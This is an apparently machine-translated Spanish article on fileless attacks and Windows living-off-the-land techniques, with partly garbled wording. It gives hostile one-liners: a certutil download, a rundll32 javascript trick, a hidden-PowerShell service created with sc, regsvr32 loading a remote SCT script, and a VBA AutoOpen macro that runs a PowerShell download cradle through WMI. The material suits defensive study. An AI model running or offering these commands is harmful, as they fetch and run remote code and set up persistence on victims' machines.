En el campo de la seguridad, los ataques sin archivos significan amenazas extremadamente graves. El término "sin archivo" es un término que nació al discutir formas de eludir la tecnología de detección de archivos maliciosos. El "ataque sin archivos" es solo una estrategia de ataque cuyo punto de partida es evitarPoner archivos maliciosos en el disco, Para evadir la detección del software de seguridad tradicional.
Este campo de conocimiento involucra dos áreas principales de análisis inverso de virus y pruebas de penetración.
Tipos de ataques sin archivos
Las vulnerabilidades de protocolo y las vulnerabilidades de Office más famosas de los últimos años:
Nombre del virus | Tipo de vulnerabilidad | Número CVE | Ubicación de la vulnerabilidad |
---|---|---|---|
Vulnerabilidades de Office | CVE-2017-0199 | Objeto OLE2LINK incrustado | |
Vulnerabilidades de Office | CVE-2017-11882 (Fórmula 1 de pesadilla) | Editor de fórmulas EQNEDT32.EXE | |
Vulnerabilidades de Office | CVE-2018-0802 (Fórmula Pesadilla II) | Editor de fórmulas EQNEDT32.EXE | |
Quiero llorar | Vulnerabilidad SMB | ms17-010 | Puerto 445 del sistema operativo Windows |
SQLSlammer (zafiro) | Vulnerabilidad WEB | - | SQLSERVER2000 al analizar el puerto 1434 vulnerabilidad de desbordamiento del búfer |
Reproducción y análisis de vulnerabilidades CVE-2018-0802
https://www.freebuf.com/vuls/160386.html
Archivos y métodos utilizados con frecuencia en ataques sin archivos
certutil.exe
descarga el archivo de la URL especificada y lo guarda en outfile.file: certuil.exe -urlcache -split -f [URL] outfile.file; codificación y decodificación base64, etc.
Script AutoIT
Utilice la herramienta Autoit3 decompiler-Exe2Aut para descompilar archivos ejecutables.
Enlace de descarga: http://domoticx.com/autoit3-decompiler-exe2aut/
Este programa es un programa de instalación de servicios de certificados en Windows, que puede descargar, codificar y decodificar certificados. En el entorno de penetración real, también podemos usarlo para resolver algunas situaciones en las que no se pueden cargar scripts.
mshta.exe ejecuta el archivo HTA
HTA es la abreviatura de HTML Application (aplicación HTML). Es un nuevo concepto de desarrollo de software. Es un software de aplicación independiente que guarda HTML directamente en formato HTA, que no es diferente de la interfaz de software diseñada por lenguajes de programación como como VB y C ++. Durante mucho tiempo, los archivos HTA se han utilizado como parte de programas maliciosos por ataques web o programas de descarga de malware en estado salvaje. Los archivos HTA son ampliamente conocidos en el campo de la seguridad de la red. Desde la perspectiva de los equipos rojo y azul, es una de las valiosas formas "antiguas" de eludir la lista blanca de aplicaciones.
En la
ventana cmd de bitsadmin , puede usar bitsadmin para evitar el firewall y descargar troyanos
schtasks.exe
panel de control, sistema de seguridad, herramientas de administración, programador de tareas
o programa taskchd.msc abierto directamente La
tarea programada en sí se puede ejecutar con privilegios elevados , sin pasar directamente por las restricciones de UAC
Rundll32.exe
parámetros normales de rundll32.exe: RUNDLL32.EXE nombre dll, punto de entrada, argumentos opcionales
Técnicas utilizadas por Poweliks:
rundll32.exe javascript:”\..\ mshtml,RunHTMLApplication “;alert(‘payload’);
sc.exe
sc create Payloadservice binpath= “C:\Windows\system32\cmd.exe /c start /b /min powershell.exe -nop -w hidden [REMOVED]”
regsvr32.exe
Dromedan dropper utilizó regsvr32.exe para cargar archivos DLL maliciosos mediante los siguientes métodos.
regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Wmic.exe Los
datos de WMI se almacenan codificados en varios archivos en el% System% \ wbem \ repository
A la organización atacante de Cozyduke le gusta colocar toda la carga útil maliciosa en el repositorio de WMI
Apagar escribir de nuevo
A la organización Dridex le gusta volver a llamar cuando se apaga la máquina para liberar los archivos maliciosos, a fin de minimizar la exposición de archivos maliciosos. De manera similar, el zorro de sangre RootKit usa un período de apagado para liberar controladores maliciosos.
La macro VB llama a WMI y luego llama a powershell
Sub AutoOpen()
[REMOVED]
Set objWMIService = GetObject(“winmgmts:\\” &
strComputer & “\root\cimv2”)
[REMOVED]
objProcess.Create o & “ -ExecutionPolicy Bypass
-WindowStyle Hidden -noprofile -noexit -c if
([IntPtr]::size -eq 4) {
(new-oabject Net.Webclient.
DownloadString(“ & [REMOVED]
End Sub
referencias
https://www.cnblogs.com/meandme/p/10337267.html
Utilice tareas programadas y bitsadmin para lograr un control a largo plazo del código malicioso
https://blog.csdn.net/qq_31481187/article/details/57540231